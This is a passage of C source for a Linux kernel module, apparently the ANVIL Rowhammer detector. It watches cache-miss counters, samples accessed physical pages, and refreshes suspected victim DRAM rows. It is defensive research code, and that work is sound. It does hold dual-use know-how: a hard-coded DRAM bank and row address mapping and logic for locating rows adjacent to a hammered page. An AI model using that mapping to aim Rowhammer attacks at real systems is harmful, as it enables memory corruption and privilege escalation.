 12 | #include <linux/err.h>
 13 | #include <linux/percpu.h>
 14 | #include <linux/mm.h>
 15 | #include <linux/highmem.h>
 16 | #include <linux/sched.h>
 17 | #include <asm/page.h>
 18 | #include <asm/uaccess.h>
 19 | #include <linux/delay.h>
 20 | 
 21 | #include "anvil.h"
 22 | 
 23 | #define MIN_SAMPLES 0
 24 | #define REFRESHED_ROWS 1
 25 | 
 26 | #define get_bank(page) ((page>>2)&7)^((page>>6)&7)
 27 | 
 28 | MODULE_LICENSE("GPL");
 29 | 
 30 | static struct hrtimer sample_timer;
 31 | static ktime_t ktime;
 32 | static u64 old_val,val;
 33 | static u64 old_l1D_val,l1D_val,miss_total;
 34 | static sample_t sample_buffer[SAMPLES_MAX];
 35 | static int sampling;
 36 | static int start_sampling=0;
 37 | static int sample_head;
 38 | static unsigned int sample_total;
 39 | static profile_t profile[PROFILE_N];
 40 | static unsigned int record_size;
 41 | /* counts number of times L1 threhold was
 42 | passed (sampling was done) */
 43 | static unsigned long L1_count=0;
 44 | /* counts number of times hammering was detected */
 45 | static unsigned long L2_count=0;
 46 | static unsigned long refresh_count=0;
 47 | static unsigned int hammer_threshold;
 48 | unsigned long dummy;
 49 | 
 50 | /* for logging */
 51 | static struct sample_log log[25000];
 52 | static int log_index=0;
 53 | 
 54 | static struct workqueue_struct *action_wq;
 55 | static struct workqueue_struct *llc_event_wq;
 56 | static struct work_struct task;
 57 | static struct work_struct task2;
 58 | 
 59 | static void sort(void);
 60 | static void build_profile(void);
 61 | DEFINE_PER_CPU(struct perf_event *, llc_event);
 62 | DEFINE_PER_CPU(struct perf_event *, l1D_event);
 63 | DEFINE_PER_CPU(struct perf_event *, ld_lat_event);
 64 | DEFINE_PER_CPU(struct perf_event *, precise_str_event);
 65 | 
 66 | void action_wq_callback( struct work_struct *work);
 67 | void llc_event_wq_callback( struct work_struct *work);
 68 | 
 69 | void llc_event_callback(struct perf_event *event,
 70 |             struct perf_sample_data *data,
 71 |             struct pt_regs *regs){}
 72 | 
 73 | void l1D_event_callback(struct perf_event *event,
 74 |             struct perf_sample_data *data,
 75 |             struct pt_regs *regs){}
 76 | 
 77 | /* returns a pfn of a page "inc" rows above the page "phy" in a base row */ 
 78 | /*@input: phy - physical page in base DRAM row
 79 | @input: inc - offset to the base row
 80 | 
 81 | @return: pfn of page in the row base row - inc
 82 | */
 83 | 
 84 | static unsigned long get_row_plus(unsigned long phy, int inc){
 85 | 	unsigned long bank_old = get_bank(phy);
 86 | 	unsigned long row_new = (phy>>6) + inc;
 87 | 	unsigned long bank_new = (row_new & 0x7) ^ bank_old;
 88 | 	unsigned long rank_new = (phy>>7)&1;
 89 | 
 90 | 	return (unsigned long)((row_new << 6) | (rank_new << 5) | (bank_new << 2) | (phy & 0x3));
 91 | 
 92 | }
 93 | 
 94 | /* returns a pfn of a page "dec" rows below the page "phy" in a base row */ 
 95 | /*@input: phy - physical page in base DRAM row
 96 | @input: dec - offset to the base row
 97 | 
 98 | @return: pfn of page in the row base row - dec
 99 | */
100 | 
101 | static unsigned long get_row_minus(unsigned long phy, int dec){
102 | 	unsigned long bank_old = get_bank(phy);
103 | 	unsigned long row_new = (phy>>6) - dec;
104 | 	unsigned long bank_new = (row_new & 0x7) ^ bank_old;
105 | 	unsigned long rank_new = (phy>>7)&1;
106 | 
107 | return  (unsigned long)((row_new << 6) | (rank_new << 5) | (bank_new << 2) | (phy & 0x3));
108 | 
109 | }
110 | 
111 | 
112 | /* convert virtual address from user process into physical address */
113 | /* @input: mm - memory discriptor user process
114 |    @input: virt - virtual address
115 | 
116 |    @return: corresponding physical address of "virt" */
117 | 
118 | static unsigned long virt_to_phy( struct mm_struct *mm,unsigned long virt)
119 | {
120 | 	unsigned long phys;
121 | 	struct page *pg;
122 | 	int ret = get_user_pages ( NULL,
123 |  								mm,
124 |  								virt,
125 |  								1,
126 |  								0,
127 |  								0,
128 |  								&pg,
129 |  								NULL);
130 | 
131 | 	if(ret <= 0)
132 | 		return 0;
133 | 	/* get physical address */
134 | 	phys = page_to_phys(pg);
135 | 	return phys;
136 | }
137 | 
138 | /* Interrupt handler for store sample */
139 | void precise_str_callback(struct perf_event *event,
140 |             				struct perf_sample_data *data,
141 |             				struct pt_regs *regs)
142 | {
143 | 	/* Check source of store, if local dram (|0x80) record sample */
144 | 	if(data->data_src.val & (1<<7)){
145 | 	
146 | 		sample_buffer[sample_head].phy_page = virt_to_phy(current->mm,data->addr)>>12;
147 | 		if(sample_buffer[sample_head].phy_page > 0){
148 | 			sample_buffer[sample_head].addr = data->addr;
149 | 			/* limit sample index */
150 | 			if(++sample_head > SAMPLES_MAX-1)
151 | 				sample_head = SAMPLES_MAX-1;
152 | 
153 | 			sample_total++;
154 | 		}
155 | 	}
156 | }
157 | 
158 | /* Interrupt handler for load sample */
159 | void load_latency_callback(struct perf_event *event,
160 |             struct perf_sample_data *data,
161 |             struct pt_regs *regs)
162 | {	
163 | 	sample_buffer[sample_head].phy_page = virt_to_phy(current->mm,data->addr)>>12;
164 | 
165 | #ifdef DEBUG
166 | 	sample_buffer[sample_head].addr = data->addr;
167 | 	sample_buffer[sample_head].lat = data->weight;
168 | #endif
169 | 
170 | 	/* limit sample index */
171 | 	if(++sample_head > SAMPLES_MAX-1)
172 | 		sample_head = SAMPLES_MAX-1;
173 | 	
174 | 	sample_total++;
175 | }
176 | 
177 | void llc_event_wq_callback(struct work_struct *work)
178 | {
179 | 	int cpu;
180 | 	u64 enabled,running;
181 | 	u64 ld_miss;
182 | 
183 | 	/* If we were sampling, stop sampling and analyze samples */
184 | 	if(sampling){
185 | 		/* stop sampling */
186 | 		for_each_online_cpu(cpu){
187 | 			perf_event_disable(per_cpu(ld_lat_event,cpu));
188 | 			perf_event_disable(per_cpu(precise_str_event,cpu));
189 | 		}
190 | 		sampling = 0;			
191 | 		/* start task that anayzes samples and take action */ 
192 | 		queue_work(action_wq, &task);
193 | 	}							
194 | 	else if(start_sampling){
195 | 		/* update MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS value */
196 | 		l1D_val = 0;
197 | 		for_each_online_cpu(cpu){
198 |         	l1D_val += perf_event_read_value(per_cpu(l1D_event,cpu), 
199 | 											&enabled, &running);
200 | 		}
201 | 							
202 | 		ld_miss = l1D_val - old_l1D_val;
203 | 						
204 | 		/* Sample loads, stores or both based on LLC load miss count */
205 | 		if(ld_miss >= (miss_total*9)/10){
206 | 			for_each_online_cpu(cpu){
207 | 				perf_event_enable(per_cpu(ld_lat_event,cpu));//sample loads only
208 | 			}
209 | 		}
210 | 
211 | 		else if(ld_miss < miss_total/10){
212 | 			for_each_online_cpu(cpu){
213 | 				perf_event_enable(per_cpu(precise_str_event,cpu));//sample stores only
214 | 			}
215 | 		}
216 | 
217 | 		else{
218 | 			for_each_online_cpu(cpu){
219 | 				/* sample both */
220 | 				perf_event_enable(per_cpu(ld_lat_event,cpu));
221 | 				perf_event_enable(per_cpu(precise_str_event,cpu));
222 | 			}			
223 | 		}
224 | 							
225 | 		sample_total = 0;
226 | 		record_size = 0;
227 | 		sample_head = 0;
228 | 			
229 | 		/* log how many times we passed the threshold */
230 | 		L1_count++;
231 | 		start_sampling = 0;
232 | 		sampling = 1;
233 | 	}
234 | 
235 | 	old_l1D_val = l1D_val;
236 | }
237 | 
238 | /* look at sample profile and take action */
239 | void action_wq_callback( struct work_struct *work)
240 | {
241 | 	int rec,log_;
242 | 	unsigned long pfn1,pfn2;
243 | 	unsigned long *virt;
244 | 	struct page *pg1,*pg2;
245 | 	int i;
246 | 		
247 | 	/* group samples based on physical pages */
248 | 	build_profile();
249 | 	/* sort profile, address with highest number
250 | 	of samples first */
251 | 	sort();
252 | 
253 | #ifdef DEBUG
254 | 	log_=0;
255 | #endif
256 | 
257 | 	if(miss_total > LLC_MISS_THRESHOLD){//if still  high miss
258 | 		printk("samples = %u\n",sample_total);
259 | 		/* calculate hammer threshold */
260 | 		hammer_threshold = (LLC_MISS_THRESHOLD*sample_total)/miss_total;
261 | 
262 | 		/* check for potential agressors */
263 | 		for(rec = 0;rec<record_size;rec++){
264 | #ifdef DEBUG
265 | 			profile[rec].hammer = 0;
266 | #endif
267 | 			if((profile[rec].llc_total_miss >= hammer_threshold/2) && (sample_total>= MIN_SAMPLES)){
268 | #ifdef DEBUG
269 | 				log_ = 1;
270 | 				profile[rec].hammer = 1;
271 | 				L2_count++;
272 | #endif
273 | 				/* potential hammering detected , deploy refresh */
274 | 				for(i=1;i<=REFRESHED_ROWS;i++){
275 | 				/* get page frame number for pages in rows above and below */
276 | 					pfn1 = get_row_plus(profile[rec].phy_page,i);// pfn for victim row1
277 | 					pfn2 = get_row_minus(profile[rec].phy_page,i);// pfn for victim row2
278 | 
279 | 					/* get physical page */
280 | 					pg1 = pfn_to_page(pfn1);
281 | 					pg2 = pfn_to_page(pfn2);
282 | 			
283 | 					/* map pages to kernel space and refresh */
284 | 					virt = (unsigned long*)kmap(pg1);
285 | 					if(virt){
286 | 						asm volatile("clflush (%0)"::"r"(virt):"memory");
287 | 						get_user(profile[rec].dummy1,virt);
288 | 						kunmap(pg1);
289 | 					}
290 | 
291 | 					virt = (unsigned long*)kmap(pg2);
292 | 					if(virt){
293 | 						asm volatile("clflush (%0)"::"r"(virt):"memory");
294 | 						get_user(profile[rec].dummy2,virt);
295 | 						kunmap(pg2);
296 | 					}
297 | 				}
298 | #ifdef DEBUG
299 | 				refresh_count++;
300 | #endif
301 | 			}
302 | 		}
303 | 	}
304 | 
305 | #ifdef DEBUG
306 | 	if(log_){
307 | 		for(rec = 0;rec<record_size;rec++){
308 | 			log[log_index].profile[rec].phy_page = profile[rec].phy_page;
309 | 			log[log_index].profile[rec].llc_percent_miss = profile[rec].llc_percent_miss;
310 | 			log[log_index].profile[rec].dummy1 = profile[rec].dummy1;
311 | 			log[log_index].profile[rec].dummy2 = profile[rec].dummy2;
312 | 			log[log_index].profile[rec].hammer = profile[rec].hammer;
313 | 		}
314 | 		log[log_index].record_size = record_size;
315 | 		log[log_index].sample_total = sample_total;
316 | 		log_index++;
317 | 		if(log_index > 24999)
318 | 			log_index = 24999;
319 | 	}
320 | #endif
321 | 	return;
322 | }
323 | 
324 | /* Timer interrupt handler */
325 | enum hrtimer_restart timer_callback( struct hrtimer *timer )
326 | {
327 | 	ktime_t now;
328 | 	u64 enabled,running;
329 | 	int cpu;
330 |         
331 |     /* Update llc miss counter value */
332 | 	val = 0;
333 | 	for_each_online_cpu(cpu){
334 |     	val += perf_event_read_value(per_cpu(llc_event,cpu), &enabled, &running);
335 | 	}
336 | 
337 | 	miss_total = val - old_val;
338 | 	old_val = val;
339 | 	if(!sampling){
340 | 	/* Start sampling if miss rate is high */
341 | 		if(miss_total > LLC_MISS_THRESHOLD){
342 | 			start_sampling = 1;
343 | 			/* set next interrupt interval for sampling */
344 | 			ktime = ktime_set(0,sample_timer_period);
345 |       		now = hrtimer_cb_get_time(timer); 
346 |       		hrtimer_forward(&sample_timer,now,ktime);
347 | 		}
348 | 
349 | 		else{
350 | 			/* set next interrupt interval for counting */
351 | 			ktime = ktime_set(0,count_timer_period);
352 |      		now = hrtimer_cb_get_time(timer); 
353 |       		hrtimer_forward(&sample_timer,now,ktime);
354 | 		}
355 | 	}
356 | 
357 | 	else{
358 | 		ktime = ktime_set(0,count_timer_period);
359 |      	now = hrtimer_cb_get_time(timer); 
360 |       	hrtimer_forward(&sample_timer,now,ktime);
361 | 	}
362 | 				
363 | 	/* start task that analyzes llc misses */
364 | 	queue_work(llc_event_wq, &task2);
365 | 
366 | 	/* restart timer */
367 |    	return HRTIMER_RESTART;
368 | }
369 | 
370 | /* Groups samples accoriding to accessed physical pages */
371 | static void build_profile(void)
372 | {
373 | 	int rec,smpl,recorded;
374 | 	sample_t sample;
375 | 
376 | 	if(sample_total > 0){
377 | 		sample = sample_buffer[0];
378 | 		profile[0].phy_page 	= sample.phy_page;
379 | 		profile[0].page = (sample.addr);
380 | 		profile[0].llc_total_miss = 1;
381 | 		profile[0].llc_percent_miss = 100;
382 | 		profile[0].cpu 	= sample.cpu;
383 | 		record_size = 1;
384 | 			
385 | 		for(smpl=1; smpl<sample_head; smpl++){
386 | 			sample = sample_buffer[smpl];
387 | 
388 | 			/* see if page already exists */
389 | 			recorded = 0;
390 | 			for(rec=0;rec<record_size;rec++){
391 | 				if((profile[rec].phy_page != 0) && 
392 | 					(profile[rec].phy_page == sample.phy_page)){
393 | 					profile[rec].llc_total_miss++;
394 | 					profile[rec].cpu 	= sample.cpu;
395 | 					recorded = 1;
396 | 					break;
397 | 				}
398 | 			}
399 | 
400 | 			if(!recorded){
401 | 				/* must be new record */
402 | 				/* If there is space in the profile add new record
403 | 				else replace the last one  (The least miss in the profile) */
404 | 				if(record_size < PROFILE_N){
405 | 					profile[record_size].phy_page 	= sample.phy_page;
406 | 					profile[record_size].page = (sample.addr);
407 | 					profile[record_size].llc_total_miss = 1;
408 | 					profile[record_size].cpu = sample.cpu;
409 | 					record_size++;
410 | 				}
411 | 
412 | 				else{
413 | 					profile[record_size - 1].phy_page = sample.phy_page;
414 | 					profile[record_size - 1].page = (sample.addr);
415 | 					profile[record_size - 1].llc_total_miss = 1;
416 | 					profile[record_size - 1].cpu = sample.cpu;
417 | 				}
418 | 			}
419 | 		}
420 | 
421 | #ifdef DEBUG
422 | 		/* calculate percentage */
423 | 		for(rec=0;rec<record_size;rec++){
424 | 			profile[rec].llc_percent_miss = (profile[rec].llc_total_miss*100)/sample_total;
425 | 		}
426 | #endif
427 | 	}
428 | }
429 | 
430 | /* Sort addresses with higest address distribution first */
431 | static void sort(void){
432 | 	int swapped,rec;
433 | 	do{
434 | 		swapped = 0;
435 | 		for(rec = 1; rec<record_size; rec++){
436 | 			if(profile[rec-1].llc_percent_miss < profile[rec].llc_percent_miss){
437 | 				profile_t temp = profile[rec-1];
438 | 				profile[rec-1] = profile[rec];
439 | 				profile[rec] = temp;
440 | 				swapped = 1;
441 | 			}
442 | 		}
443 | 	}while(swapped);
444 | }
445 | 
446 | 
447 | /* Initialize module */
448 | static int start_init(void)
449 | {
450 | 	int cpu;
451 | 	old_val = 0;
452 | 	/* Setup LLC Miss event */
453 | 	for_each_online_cpu(cpu){
454 |    		per_cpu(llc_event, cpu) = perf_event_create_kernel_counter(&llc_miss_event, cpu,
455 |                  NULL,llc_event_callback,NULL);
456 |    	 	if(IS_ERR(per_cpu(llc_event, cpu))){
457 |         	printk("Error creating llc event.\n");
458 |         	return 0;
459 |     	}				
460 | 		/* start counting */
461 | 		perf_event_enable(per_cpu(llc_event, cpu));
462 | 	}
463 | 
464 | 	old_l1D_val = 0;
465 | 	/* setup LLC Miss event */
466 | 	for_each_online_cpu(cpu){
467 |    		per_cpu(l1D_event, cpu) = perf_event_create_kernel_counter(&l1D_miss_event, cpu,
468 |                  NULL,l1D_event_callback,NULL);
469 |    	 	if(IS_ERR(per_cpu(l1D_event, cpu))){
470 |         	printk("Error creating l1D miss event.\n");
471 |         	return 0;
472 |     	}
473 | 						
474 | 		/* start counting */
475 | 		perf_event_enable(per_cpu(l1D_event, cpu));
476 | 	}
477 | 
478 | 	/* setup load latency event */
479 | 	for_each_online_cpu(cpu){
480 |    		per_cpu(ld_lat_event, cpu) = perf_event_create_kernel_counter(&load_latency_event, cpu,
481 |                  													NULL,load_latency_callback,NULL);
482 |    	 	if(IS_ERR(per_cpu(ld_lat_event, cpu))){
483 |         	printk("Error creating load latency event.\n");
484 |         	return 0;
485 |     	}
486 | 	}
487 | 
488 | 	/* setup precise store event */
489 | 	for_each_online_cpu(cpu){
490 |    		per_cpu(precise_str_event, cpu) = perf_event_create_kernel_counter(&precise_str_event_attr, cpu,
491 |                  															NULL,precise_str_callback,NULL);
492 |    	 	if(IS_ERR(per_cpu(precise_str_event, cpu))){
493 |         	printk("Error creating precise store event.\n");
494 |         	return 0;
495 |     	}
496 | 	}
497 | 
498 | 	/* setup Timer */
499 |     ktime = ktime_set(0,count_timer_period);
500 |     hrtimer_init(&sample_timer,CLOCK_REALTIME,HRTIMER_MODE_REL);
501 |     sample_timer.function = &timer_callback;
502 |     hrtimer_start(&sample_timer,ktime,HRTIMER_MODE_REL);
503 |      
504 | 	/* initialize work queue */
505 | 	action_wq = create_workqueue("action_queue");
506 | 	INIT_WORK(&task, action_wq_callback);
507 | 
508 | 	llc_event_wq = create_workqueue("llc_event_queue");
509 | 	INIT_WORK(&task2, llc_event_wq_callback);
510 | 
511 | 	printk("done initializing\n");
512 |   	
513 |    	return 0;
514 | }
515 | 
516 | /* Cleanup module */
517 | static void finish_exit(void)
518 | {
519 |     int ret,cpu,i,j; 
520 |     /* timer */
521 |     ret = hrtimer_cancel(&sample_timer);
522 | 
523 |     /* llc_event */
524 | 	for_each_online_cpu(cpu){
525 |     	if(per_cpu(llc_event, cpu)){
526 |     		perf_event_disable(per_cpu(llc_event, cpu));
527 |        		perf_event_release_kernel(per_cpu(llc_event, cpu));
528 |     	}
529 | 	}
530 | 
531 | 	/* l1D_event */
532 | 	for_each_online_cpu(cpu){
533 |     	if(per_cpu(l1D_event, cpu)){
534 |     		perf_event_disable(per_cpu(l1D_event, cpu));
535 |         	perf_event_release_kernel(per_cpu(l1D_event, cpu));
536 |     	}
537 | 	}
538 | 
539 | 	/* load latency event */
540 | 	for_each_online_cpu(cpu){
541 |     	if(per_cpu(ld_lat_event, cpu)){
542 |         	perf_event_disable(per_cpu(ld_lat_event, cpu));
543 |         	perf_event_release_kernel(per_cpu(ld_lat_event, cpu));
544 |     	}
545 | 	}
546 | 
547 | 	/* precise store event */
548 | 	for_each_online_cpu(cpu){
549 |     	if(per_cpu(precise_str_event, cpu)){
550 |     		perf_event_disable(per_cpu(precise_str_event, cpu));
551 |         	perf_event_release_kernel(per_cpu(precise_str_event, cpu));
552 |    		 }
553 | 	}
554 | 
555 | 	flush_workqueue(action_wq);
556 |   	destroy_workqueue(action_wq);
557 | 	flush_workqueue(llc_event_wq);
558 |   	destroy_workqueue(llc_event_wq);
559 | 
560 | #ifdef DEBUG
561 | 	/* Log of ANVIL. CSV of some of the sampled/detected addresses */
562 | 			 
563 | 	printk(">>>>>>>>>>>>>>>>log dump>>>>>>>>>>>>>>>\n");
564 | 	/* dump all the logs */
565 | 	for(i=0; i<log_index; i++)
566 | 	{
567 | 		for(j=0; j<4; j++){
568 | 			/* physical pages */
569 | 			printk("%lu,",log[i].profile[j].phy_page);
570 | 		}
571 | 
572 | 		for(j=0; j<4; j++){
573 | 			/* Values read form row above and row below */
574 | 			printk("%d,",log[i].profile[j].hammer);
575 | 			printk("0x%lx,",log[i].profile[j].dummy1);
576 | 			printk("0x%lx,",log[i].profile[j].dummy2);
577 | 		}
578 | 					
579 | 		/* Total samples per sample period */
580 | 		printk("%u\n",log[i].sample_total);
581 | 	}
582 | 	/* L1 count: Number of times LLC_MISS_THRESHOLD was crossed
583 | 	   L2 count: Number of times potential hammer activity was detected
584 | 	   Refresh: Number of addresses that resulted in refreshes */
585 | 	printk("L1 count = %lu\n",L1_count);
586 | 	printk("L2 count = %lu\n",L2_count);
587 | 	printk("Refreshs = %lu\n",refresh_count);
588 | 	printk(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n");
589 |     return;
590 | #endif
591 | }
592 | 
593 | module_init(start_init);
594 | module_exit(finish_exit);
595 | 


--------------------------------------------------------------------------------